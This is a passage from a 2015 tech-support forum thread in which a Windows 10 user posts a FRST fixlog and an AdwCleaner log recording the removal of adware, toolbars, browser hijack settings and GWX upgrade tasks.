Task: {8FB2F090-2E3A-4FED-B924-7E5CB5A1A9F1} - System32\Tasks\TweakBit\Driver Updater\Start Driver Updater ?n logon => C:\Program Files (x86)\TweakBit\Driver Updater\DriverUpdater.exe [2015-06-02] (TweakBit) <==== ATTENTION
Task: {B2B193B4-584E-465F-A3A0-B9EEB0B8F7E7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {AAF270E4-3BE6-42B0-8B71-A03C29CE37EF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {BC4811CC-DF0C-4AB6-8CE8-B92779D9F7E9} - System32\Tasks\Scheduled Update for Ask Toolbar => C:\Program Files (x86)\Ask.com\UpdateTask.exe <==== ATTENTION
Task: {C20C6816-47C2-4AB4-B52A-C61D3A10D348} - System32\Tasks\TweakBit\Speedtest Optimizer\Start Speedtest Optimizer ?n logon => C:\Program Files (x86)\TweakBit\Speedtest Optimizer\SpeedtestOptimizer.exe [2015-08-26] (TweakBit) <==== ATTENTION
Task: {F5B37634-028A-4669-9DA2-63DECF76903C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm
EmptyTemp
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Windows\CurrentVersion\Run\\BackgroundContainer => value removed successfully
C:\Users\Ken Terry\AppData\Local\Conduit => moved successfully
"C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll" => Value data removed successfully.
"C:\PROGRA~2\SearchProtect\SearchProtect" => File/Folder not found.
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main\\Search Bar => value removed successfully
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\URLSearchHooks\\{739df940-c5ee-4bab-9d7e-270894ae687a} => value removed successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\URLSearchHooks\\{06aedb90-98b2-4989-ad0f-39d53551f6ad} => value removed successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\URLSearchHooks\\{c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} => value removed successfully
"HKCR\Wow6432Node\CLSID\{c5c4fd2c-c7ac-492c-a689-2e0843ba4e55}" => key removed successfully
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\URLSearchHooks\\{0696f815-a3a9-490a-bb14-9ec3350b1276} => value removed successfully
"HKCR\Wow6432Node\CLSID\{0696f815-a3a9-490a-bb14-9ec3350b1276}" => key removed successfully
C:\Program Files (x86)\Protected => moved successfully
C:\Program Files (x86)\TelevisionFanatic => moved successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{1AC5E05E-C560-46B2-83AB-4E5DBB92F2B2}" => key removed successfully
HKCR\CLSID\{1AC5E05E-C560-46B2-83AB-4E5DBB92F2B2} => key not found.
"HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => key removed successfully
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found.
"HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9693B710-7943-4C03-B346-5F8ABAFDFD28}" => key removed successfully
HKCR\CLSID\{9693B710-7943-4C03-B346-5F8ABAFDFD28} => key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}" => key removed successfully
"HKCR\CLSID\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}" => key removed successfully
"C:\PROGRA~2\APPGRA~1" => File/Folder not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}" => key removed successfully
"HKCR\CLSID\{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}" => key removed successfully
"C:\Program Files\Updater By SweetPacks" => File/Folder not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1CB20BF0-BBAE-40A7-93F4-6435FF3D0411}" => key removed successfully
HKCR\Wow6432Node\CLSID\{1CB20BF0-BBAE-40A7-93F4-6435FF3D0411} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2A5A2A90-3B30-4E6E-A955-2F232C6EF517}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{2A5A2A90-3B30-4E6E-A955-2F232C6EF517}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}" => key removed successfully
C:\PROGRA~2\Crawler => moved successfully
C:\Program Files (x86)\WebCake => moved successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5d79f641-c168-40df-a32f-bacea7509e75}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{5d79f641-c168-40df-a32f-bacea7509e75}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{739df940-c5ee-4bab-9d7e-270894ae687a}" => key removed successfully
HKCR\Wow6432Node\CLSID\{739df940-c5ee-4bab-9d7e-270894ae687a} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7736C7FA-512D-11E2-B871-DEC36088709B}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{7736C7FA-512D-11E2-B871-DEC36088709B}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}" => key removed successfully
C:\Users\Ken Terry\AppData\Local\TidyNetwork.com => moved successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c5c4fd2c-c7ac-492c-a689-2e0843ba4e55}" => key removed successfully
HKCR\Wow6432Node\CLSID\{c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CB0D163C-E9F4-4236-9496-0597E24B23A5} => key not found.
HKCR\Wow6432Node\CLSID\{CB0D163C-E9F4-4236-9496-0597E24B23A5} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{cb41fc95-f1b3-4797-8bb6-1012ff62abba}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{cb41fc95-f1b3-4797-8bb6-1012ff62abba}" => key removed successfully
"C:\Program Files (x86)\GamesBar" => File/Folder not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{6F282B65-56BF-4BD1-A8B2-A4449A05863D} => value not found.
HKCR\Wow6432Node\CLSID\{6F282B65-56BF-4BD1-A8B2-A4449A05863D} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{4B3803EA-5230-4DC3-A7FC-33638F3D3542} => value not found.
HKCR\Wow6432Node\CLSID\{4B3803EA-5230-4DC3-A7FC-33638F3D3542} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{c98d5b61-b0ea-4d48-9839-1079d352d880} => value removed successfully
"HKCR\Wow6432Node\CLSID\{c98d5b61-b0ea-4d48-9839-1079d352d880}" => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} => value removed successfully
HKCR\Wow6432Node\CLSID\{c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} => key not found.
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{06AEDB90-98B2-4989-AD0F-39D53551F6AD} => value removed successfully
HKCR\CLSID\{06AEDB90-98B2-4989-AD0F-39D53551F6AD} => key not found.
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{739DF940-C5EE-4BAB-9D7E-270894AE687A} => value removed successfully
HKCR\CLSID\{739DF940-C5EE-4BAB-9D7E-270894AE687A} => key not found.
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{EEE6C35B-6118-11DC-9C72-001320C79847} => value removed successfully
HKCR\CLSID\{EEE6C35B-6118-11DC-9C72-001320C79847} => key not found.
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{C5C4FD2C-C7AC-492C-A689-2E0843BA4E55} => value removed successfully
HKCR\CLSID\{C5C4FD2C-C7AC-492C-A689-2E0843BA4E55} => key not found.
HKCR\PROTOCOLS\Handler\tbr => key not found.
HKCR\CLSID\{4D25FB7A-8902-4291-960E-9ADA051CFBBF} => key not found.
Firefox "newtab" removed successfully
Firefox DefaultSearchUrl removed successfully
Firefox "Keyword.URL" removed successfully
HKLM\Software\Mozilla\Firefox\Extensions\\{7D4F1959-3F72-49d5-8E59-F02F8AA6815D} => value removed successfully
C:\Program Files\Updater By SweetPacks\Firefox => not found.
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\[email protected] => value removed successfully
C:\Program Files (x86)\TelevisionFanatic\bar\1.bin => not found.
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Mozilla\Firefox\Extensions\\[email protected] => value removed successfully
C:\Program Files (x86)\SingAlong\FF => moved successfully
C:\Program Files (x86)\SingAlong\FF => path removed successfully
C:\Program Files (x86)\mozilla firefox\firefox.cfg => moved successfully
Chrome HomePage removed successfully
Chrome StartupUrls removed successfully
Chrome DefaultSearchURL removed successfully
Chrome DefaultSearchKeyword removed successfully
Chrome DefaultSuggestURL removed successfully
C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl => moved successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fjoijdanhaiflhibkljeklcghcmmfffh" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\abepbblpkilpjohncjbccmdjhdhbnhdj" => key removed successfully
C:\Program Files (x86)\EliteUnzip => moved successfully
C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gafhhbahpojnjfhpepjjfjojbphnogmn => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1F311A34-0681-4CD1-9D84-BC11BA8A3C91}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1F311A34-0681-4CD1-9D84-BC11BA8A3C91}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{41CDA214-FD3D-49F2-838B-D6E355FCD0C7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{41CDA214-FD3D-49F2-838B-D6E355FCD0C7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{39CE9E03-E817-4DD0-A0E5-3D48949A016E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{39CE9E03-E817-4DD0-A0E5-3D48949A016E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5A56BD5D-7692-4DC3-A70A-EBEDF8E70875}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5A56BD5D-7692-4DC3-A70A-EBEDF8E70875}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{46995030-ECAB-4DB8-B941-51CDCEA684EE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{46995030-ECAB-4DB8-B941-51CDCEA684EE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{63E6FC54-C7B5-4E4D-8B46-192851267E4A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63E6FC54-C7B5-4E4D-8B46-192851267E4A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{657F89F4-A0B0-4D32-9C0C-74B49E7AF41C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{657F89F4-A0B0-4D32-9C0C-74B49E7AF41C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{67C7EE72-2933-4355-BC62-62A7EC038E3F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{67C7EE72-2933-4355-BC62-62A7EC038E3F}" => key removed successfully
C:\WINDOWS\System32\Tasks\BackgroundContainer Startup Task => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BackgroundContainer Startup Task" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8CD95DE2-BD63-4247-9709-C85F879B4E47}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CD95DE2-BD63-4247-9709-C85F879B4E47}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8FB2F090-2E3A-4FED-B924-7E5CB5A1A9F1} => key not found.
C:\WINDOWS\System32\Tasks\TweakBit\Driver Updater\Start Driver Updater ?n logon => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TweakBit\Driver Updater\Start Driver Updater ?n logon => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B2B193B4-584E-465F-A3A0-B9EEB0B8F7E7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B2B193B4-584E-465F-A3A0-B9EEB0B8F7E7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AAF270E4-3BE6-42B0-8B71-A03C29CE37EF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AAF270E4-3BE6-42B0-8B71-A03C29CE37EF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BC4811CC-DF0C-4AB6-8CE8-B92779D9F7E9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BC4811CC-DF0C-4AB6-8CE8-B92779D9F7E9}" => key removed successfully
C:\WINDOWS\System32\Tasks\Scheduled Update for Ask Toolbar => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Scheduled Update for Ask Toolbar" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C20C6816-47C2-4AB4-B52A-C61D3A10D348} => key not found.
C:\WINDOWS\System32\Tasks\TweakBit\Speedtest Optimizer\Start Speedtest Optimizer ?n logon => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TweakBit\Speedtest Optimizer\Start Speedtest Optimizer ?n logon => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F5B37634-028A-4669-9DA2-63DECF76903C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F5B37634-028A-4669-9DA2-63DECF76903C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
C:\ProgramData\Reprise => ":wupeogjxldtlfudivq`qsp`26hfm" ADS removed successfully.
EmptyTemp => Error: No automatic fix found for this entry.

==== End of Fixlog 11:36:50 ====
kfoxsr is offline  
Old 09-18-2015, 09:53 AM   #8
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



# AdwCleaner v5.008 - Logfile created 18/09/2015 at 11:41:41
# Updated 18/09/2015 by Xplode
# Database : 2015-09-17.3 [Server]
# Operating system : Windows 10 Home (x64)
# Username : Ken Terry - KENTERRY-HP
# Running from : C:\Users\Ken Terry\Downloads\AdwCleaner.exe
# Option : Cleaning
# Support : Forum - ToolsLib

***** [ Services ] *****

[-] Service Deleted : TelevisionFanaticService
[-] Service Deleted : Updater By SweetPacks
[-] Service Deleted : YahooAUService

***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files\Uninstaller
[-] Folder Deleted : C:\Program Files\Earth Networks
[-] Folder Deleted : C:\Program Files\daugava
[-] Folder Deleted : C:\Program Files (x86)\Conduit
[-] Folder Deleted : C:\Program Files (x86)\Free Offers from Freeze.com
[-] Folder Deleted : C:\Program Files (x86)\ParetoLogic
[-] Folder Deleted : C:\Program Files (x86)\tuguu sl
[-] Folder Deleted : C:\Program Files (x86)\VideoConverter
[-] Folder Deleted : C:\Program Files (x86)\DriverFinder
[-] Folder Deleted : C:\Program Files (x86)\Playalot Games
[-] Folder Deleted : C:\Program Files (x86)\Yahoo!\Companion
[-] Folder Deleted : C:\Program Files (x86)\TelevisionFanaticEI
[-] Folder Deleted : C:\Program Files (x86)\SingAlong
[-] Folder Deleted : C:\Program Files (x86)\Common Files\ParetoLogic
[-] Folder Deleted : C:\ProgramData\apn
[-] Folder Deleted : C:\ProgramData\Ask
[-] Folder Deleted : C:\ProgramData\Conduit
[-] Folder Deleted : C:\ProgramData\FileCure
[-] Folder Deleted : C:\ProgramData\ParetoLogic
[-] Folder Deleted : C:\ProgramData\Tarma Installer
[-] Folder Deleted : C:\ProgramData\Trymedia
[-] Folder Deleted : C:\ProgramData\Yahoo! Companion
[-] Folder Deleted : C:\ProgramData\TweakBit
[-] Folder Deleted : C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
[-] Folder Deleted : C:\ProgramData\{93E26451-CD9A-43A5-A2FA-C42392EA4001}
[-] Folder Deleted : C:\ProgramData\{FA77A43D-F6ED-4924-87B5-517C061388C6}
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ParetoLogic
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VAFPlayer
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverFinder
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WeatherBug®
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Playalot Games
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Local\LPT
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Local\NativeMessaging
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Local\Smartbar
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Local\SwvUpdater
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Local\unitlayers
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Local\Mindspark_Interactive_Net
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbkbpnkkkipelfledbfocopglifcfmi
[-] Folder Deleted : C:\Users\Ken Terry\AppData\LocalLow\Conduit
[-] Folder Deleted : C:\Users\Ken Terry\AppData\LocalLow\HPAppData
[-] Folder Deleted : C:\Users\Ken Terry\AppData\LocalLow\Smartbar
[-] Folder Deleted : C:\Users\Ken Terry\AppData\LocalLow\SweetIM
[-] Folder Deleted : C:\Users\Ken Terry\AppData\LocalLow\Yahoo! Companion
[-] Folder Deleted : C:\Users\Ken Terry\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
[-] Folder Deleted : C:\Users\Ken Terry\AppData\LocalLow\Yahoo!\Companion
[-] Folder Deleted : C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanaticEI
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\OpenCandy
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\RebateInformer
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\WebCake
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\DriverFinder
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\Yahoo!\Companion
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Video Converter
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Elite Unzip
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\Smartbar
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\SweetPacksToolbarData
[-] Folder Deleted : C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\ValueApps
[-] Folder Deleted : C:\Users\KENTER~1\AppData\Local\Temp\apn
[-] Folder Deleted : C:\WINDOWS\SysWOW64\SearchProtect

***** [ Files ] *****

[-] File Deleted : C:\END
[-] File Deleted : C:\user.js
[-] File Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eBay.lnk
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_klibnahbojhkanfgaglnlalfkgpcppfi_0
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mppnoffgpafgpgbaigljliadgbnhljfl_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mppnoffgpafgpgbaigljliadgbnhljfl_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_nafaimnnclfjfedmmabolbppcngeolgf_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_nafaimnnclfjfedmmabolbppcngeolgf_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gafhhbahpojnjfhpepjjfjojbphnogmn_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gafhhbahpojnjfhpepjjfjojbphnogmn_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.bestpriceninja.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pstatic.bestpriceninja.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\local storage\hxxp_www.superfish.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\local storage\hxxps_www.superfish.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\local storage\hxxp_www.metrolyrics.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\local storage\hxxp_www.metrolyrics.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_answers.ask.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_answers.ask.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_app.mam.conduit.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_app.mam.conduit.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_audiotoaudio.dl.tb.ask.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_audiotoaudio.dl.tb.ask.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_eliteunzip.dl.tb.ask.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_eliteunzip.dl.tb.ask.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_facebook.conduitapps.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_facebook.conduitapps.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fastcontent.conduit.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fastcontent.conduit.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_inboxace.dl.tb.ask.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_inboxace.dl.tb.ask.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nortonsafe.search.ask.com_0.localstorage
